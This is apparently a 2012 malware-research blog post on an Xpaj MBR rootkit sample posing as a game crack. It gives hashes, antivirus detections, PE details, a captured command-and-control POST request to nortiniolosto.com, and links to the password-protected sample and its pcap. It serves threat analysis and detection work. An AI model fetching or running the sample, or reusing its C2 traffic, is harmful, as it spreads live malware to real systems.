Thursday, May 3, 2012

Xpaj - MBR rootkit sample

News about the Xpaj file infector brought this new donation of a sample, which I am posting now. I will add the network capture and sandbox report to augment the detailed analysis reports released by Bitdefender ("Xpaj - the bootkit edition") and Symantec ("W32.Xpaj.B is a File Infector with a Vengeance").
The file is meant to look like a crack of sorts for the game Big Air Stoked.



I accidentally overwrote this post with a blank one; many thanks to Lotta for sending the cached page and helping recreate it. It was not a long and detailed post, but I wouldn't have had time to redo it.


File Information

File: arg285172.exe
Size: 224256 bytes
MD5:  D5C12FCFEEBBE63F74026601CD7F39B2

Analysis reports:
Bitdefender: Xpaj - the bootkit edition
Symantec: W32.Xpaj.B is a File Infector with a Vengeance


Download


Download sample (contact me if you need the password)
Download sandbox results in pdf
Download pcap



Traffic Information

POST /DxODlv?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM&ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh HTTP/1.1
Host: nortiniolosto.com
Content-Length: 1279
Accept-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Pragma: no-cache
Cache-Control: no-cache

nortiniolosto.com registrant details:

Justino lupo
Justin luporito (hmaidhd@hotmail.de )
Ellshowell 143
Hershy
Bari,12345
Somalia
Tel. +252.12451254323

IP Location:     Virgin Islands, British; Road Town; Confluence Networks Inc
ASN:             AS40034
Resolve Host:    208.91.198-30.confluence-networks.com
IP Address:      208.91.198.30
Reverse IP:      1 website uses this address (nortiniolosto.com)

NetRange:       208.91.196.0 - 208.91.199.255
CIDR:           208.91.196.0/22
OriginAS:       AS40034
NetName:        CONFLUENCE-NETWORK-INC




Automatic scans
Virustotal
SHA256: 9db7ef2d1495dba921f3084b05d95e418a16f4c5e8de93738abef2479ad5b0da
SHA1: 50281de9abb1bec1b6a1f13ccd3ce3493dee8850
MD5: d5c12fcfeebbe63f74026601cd7f39b2
File size: 219.0 KB ( 224256 bytes )
File name: d5c12fcfeebbe63f74026601cd7f39b2
File type: Win32 EXE
Tags: pecompact
Detection ratio: 27 / 42
Analysis date: 2012-05-02 16:19:12 UTC ( 9 hours, 44 minutes ago )
Engine / detection name / signature date (YYYYMMDD):
AntiVir TR/Offend.KD.583315 20120502
Avast Win32:Rootkit-gen [Rtk] 20120502
AVG Agent3.BLMD 20120502
BitDefender Trojan.Generic.KD.583315 20120502
ClamAV Trojan.Xpaj 20120502
Comodo UnclassifiedMalware 20120502
DrWeb Trojan.DownLoader5.61890 20120502
Emsisoft Trojan-Dropper.Win32.Xpaj!IK 20120502
eSafe Suspicious File 20120502
F-Secure Trojan.Generic.KD.583315 20120502
Fortinet W32/Grp.IG!tr 20120502
GData Trojan.Generic.KD.583315 20120502
Ikarus Trojan-Dropper.Win32.Xpaj 20120502
Jiangmin TrojanDropper.Xpaj.d 20120502
Kaspersky Trojan-Dropper.Win32.Xpaj.a 20120502
McAfee Generic.grp!ig 20120502
McAfee-GW-Edition Heuristic.LooksLike.Win32.Suspicious.C!87 20120502
Microsoft Virus:Win32/Xpaj.gen!A 20120502
NOD32 Win32/Agent.TOW 20120502
Norman W32/Xpaj.AA 20120502
nProtect Trojan.Generic.KD.583315 20120502
Panda Generic Malware 20120502
Rising Trojan.Win32.Generic.12C39AA2 20120502
TrendMicro TROJ_DROPPER.VLI 20120502
TrendMicro-HouseCall TROJ_DROPPER.VLI 20120502
VIPRE Trojan.Win32.Generic!BT 20120502
VirusBuster Trojan.Agent!fJDKaCBGD+U 20120502

ssdeep
6144:Gqmg/v4y/MqGs38KHF1SubUriPOKAJnP:jmgXxXGNKHC
TrID
Generic Win/DOS Executable (49.9%)
DOS Executable Generic (49.8%)
Autodesk FLIC Image File (extensions: flc, fli, cel) (0.1%)
F-Prot packer identifier
PecBundle, PECompact
PEiD packer identifier
PECompact 2.xx --> BitSum Technologies
ExifTool

MIMEType.................: application/octet-stream
Subsystem................: Windows GUI
MachineType..............: Intel 386 or later, and compatibles
TimeStamp................: 0000:00:00 00:00:00
FileType.................: Win32 EXE
PEType...................: PE32
CodeSize.................: 73728
LinkerVersion............: 9.0
EntryPoint...............: 0x1000
InitializedDataSize......: 0
SubsystemVersion.........: 5.0
ImageVersion.............: 0.0
OSVersion................: 5.0
UninitializedDataSize....: 0

Portable Executable structural information

Target machine................: 0x14C (Intel 386 or later processors and compatible processors)
Entry point address...........: 0x00001000

PE Sections...................:

Name    Virtual Address  Virtual Size  Raw Size  Entropy  MD5
.text   4096             315392        201728    8.00     46280ae9e3cbad5868c4a7d45cf579c3
.rsrc   319488           24576         20992     4.35     178f207ecb903966eaddaaa6e8adb6a0
.reloc  344064           512           512       0.20     21de6af2a834127775b018f12418d101

PE Imports....................:

kernel32.dll
LoadLibraryA, GetProcAddress, VirtualAlloc, VirtualFree


PE Exports....................:

Symantec Reputation
Suspicious.Insight
ClamAV PUA Engine
Possibly Unwanted Application. While not necessarily malicious, the scanned file presents certain characteristics which depending on the user policies and environment may or may not represent a threat. For full details see: http://www.clamav.net/support/faq/pua.
First seen by VirusTotal
2012-03-29 20:35:10 UTC ( 1 month ago )
Last seen by VirusTotal
2012-05-02 16:19:12 UTC ( 9 hours, 44 minutes ago )
File names (max. 25)

arg285172.exx
d5c12fcfeebbe63f74026601cd7f39b2
d5c12fcfeebbe63f74026601cd7f39b2.exe
9db7ef2d1495dba921f3084b05d95e418a16f4c5e8de93738abef2479ad5b0da.exe
file-3862186_exe
drop/d5c12fcfeebbe63f74026601cd7
42734329
F09ED346009E537F6C5203C0468056001443F72A.exe
arg359624.exe
arg285172.exe

7 comments:

1. Thank you for offering the sample. May I have the password for this sample? (I was conducting my experiment about detecting malware.)

2. Sorry, Mila, I can't find your email in your profile...

   Reply: The link under the picture in the profile says "Email". Click on it and happiness will come.

3. Downloading, unpacking the zip file, and firing up the suspected file in IDA made me laugh. It seems there are multiple internal loader/encryptor routines inside. Old-school trick: by dumping my RAM, hopefully I will get a few hints. Many thanks Mila :)

4. Since OC is down, we used to get samples in an old, this sux.

   Reply: Why is it down? Maybe it's just today and it will be back up tomorrow.